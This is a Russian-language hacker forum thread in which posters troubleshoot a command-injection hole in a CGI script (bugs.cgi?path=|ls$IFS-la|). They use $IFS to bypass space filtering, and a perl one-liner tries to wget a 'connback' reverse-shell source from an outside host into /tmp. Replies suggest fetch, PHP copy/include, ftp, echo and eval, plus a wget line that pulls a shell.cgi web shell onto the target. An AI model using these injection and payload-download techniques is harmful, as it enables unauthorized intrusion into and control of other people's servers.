Есть уязв. вида bugs.cgi?path=|ls$IFS-la|, т.е. пробел надо заменять на $IFS , но на этом не вся беда, беда в том,что вроде и прав для залива хватает, но wget не пашет , curl тоже, думаю дело в $IFS, пробывал обойти это при помощи Code: `perl$IFS-e$IFS"print$IFS.ch(39).wget$IFSxxx.narod.ru.chr(39).chr(47).connback.c$IFS.chr(45).O'.chr(47).'tmp'.chr(47).'connback.c.chr(39)"|` Думаю поонятно, что пытался замутить конбек, но фиг с маслом. Может есть решение в данной проблеме!?
у меня была такая запарка месяц назад на одном из рус серваков.... у тебя случаем не фря тама ..... кароче, мне помог fetch (так вроде прально пишиЦа) .... а тут ты загнул крендель кул
не факт, что качалки есть... нашел трабл... решай... но если не получается закачать шелл средствами sh пользуй пхп на данный момент: типа copy или иклюд четнаподобие... сомневаюсь, что поддержка пхп отключена или
у меня была проблема такого же типа..причем на серве стояла OSF1 ось...which там не пахало, качалки все испробовал - результата 0. так ничего и не залил.файл создается через touch,но средствами echo так и не вышло ничего записать в файл...ничего не вышло вобщем...
2 ettee echo не понимает знака > перенаправления !!! Все, что тут сказано испробовал, но не работает . Спасибо всем!!!
2 Xex Да ты прав можно пробовать через ftp, но напомни синтаксис ! Я пробовал давно, но так и не смог получить результата !
Проверь сущевствуют ли воще качалки командой which. Потом пробуй тогда wget$IFShttP://site.com/shell.cgi я думаю должно залиться ели пробуй через echo мутить. И последний твой способ через eval замутить.